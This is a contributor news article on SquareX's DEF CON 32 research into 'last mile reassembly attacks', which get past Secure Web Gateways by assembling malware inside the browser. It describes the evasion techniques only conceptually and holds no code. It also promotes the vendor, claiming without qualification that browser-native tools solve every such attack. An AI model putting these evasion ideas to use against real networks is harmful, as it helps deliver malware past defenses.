Opinions expressed by Digital Journal contributors are their own.
SquareX’s founder, Vivek Ramachandran, and the SquareX team presented research that sent shockwaves through the cybersecurity industry at this year’s DEF CON 32 main stage talk — the world’s biggest cybersecurity conference. His team uncovered fundamental flaws in Secure Web Gateways (SWGs), a tool millions of enterprises use to safeguard their employees’ web browsing.
Ramachandran detailed how attackers can exploit these flaws using a class of evasion technique he calls “last mile reassembly attacks,” effectively bypassing SWG protections to deploy malware undetected.
Globally, most large businesses rely on SWGs as their only browser defense, making SquareX’s findings particularly alarming. These systems, designed to monitor and block malicious internet traffic, apparently falter when malware assembly occurs directly within a web browser, circumventing traditional network layer detection methods.
Ramachandran pointed out, “The trigger for an SWG to work is a malicious file download. We demonstrated how attackers can completely sidestep this detection mechanism by directly assembling the malware on the browser. In some of these techniques, the SWG doesn’t even have a clue that a file download happened.”
Simple techniques that completely bypass secure web gateways
Secure Web Gateways sit between the internet and the employee’s device to filter and monitor all incoming and outgoing network traffic. SWGs enforce company security policies to block access to malicious websites, prevent malware downloads, control data exfiltration, and so on.
Despite their critical role in enterprise security, SquareX’s research revealed that many SWGs are ill-equipped to handle the complexities of modern SaaS and web applications, especially the intricate client-side manipulations that can now be performed.
Ramachandran’s team demonstrated more than 30 different methods for bypassing these security systems.
For example, SWGs do not monitor many different channels of data flow, such as gRPC, Websocket, WebRTC, and so on. This leaves the doors wide open for attackers to smuggle malicious content through these channels and deliver even well-known malware to the endpoint without triggering any alarms from the SWG.
In another scenario, an attacker embeds malware within a web page’s image or CSS file. The SWG sees only harmless data fragments and allows them to pass through. Once inside the browser, the client-side script extracts malware from the image or CSS and drops it to the user’s system as a ‘regular’ file download. This is another category of bypasses that SquareX coins as ‘Hiding in Plain Sight.’
Phishing pages can also be constructed entirely on the client side using a Canvas Engine. As the name suggests, Ramachandran gives an analogy to visualize this bypass: “Rather than shipping a famous painting that the guards well know, invite the artist so he can recreate the entire painting for you.” Without the components of the phishing page passing through the network, SWGs cannot analyze the web page and deem it malicious.
Enterprises and vendors can test the state of their web defense at browser.security, a website with all these SWG bypasses embedded.
According to Ramachandran, the only way an SWG can protect against Last Mile Reassembly Attacks is “if the browser state is being sent back to the cloud in a synchronized manner.” However, he notes that “scaling such a solution for millions of requests is just not feasible from a time and cost perspective.”
Impact and industry response
The disclosure of these vulnerabilities raises substantial concerns about the effectiveness of current cybersecurity measures. Many organisations use SWGs as a cornerstone of their defense strategies to intercept harmful data before it reaches end-users. However, Ramachandran’s findings suggest that reliance on these systems may be misplaced.
The reaction from SWG vendors and the broader cybersecurity community has been mixed. Some vendors have acknowledged the issue but admitted there are no immediate solutions, while others have remained silent. This has left many cybersecurity professionals reconsidering the role and capability of SWGs in their security frameworks.
Ramachandran did not mince words about the severity of the issue: “This isn’t just a minor glitch that can be patched with an update. It’s a deep architectural failure that could require a fundamental overhaul of how SWGs are designed and deployed.”
A browser-native solution solves all the above attacks. An SWG can only effectively counter these attacks by transferring the state from the browser to the cloud in real-time. However, this process would significantly hinder the user experience, necessitate significant reengineering efforts for many vendors, and ultimately be a very costly solution.
The call for change in cybersecurity solutions has never been louder as the industry digests these findings. Enterprises now face the challenge of adapting their defenses in light of these exploitable vulnerabilities, a task that will likely define cybersecurity strategy in the coming years.
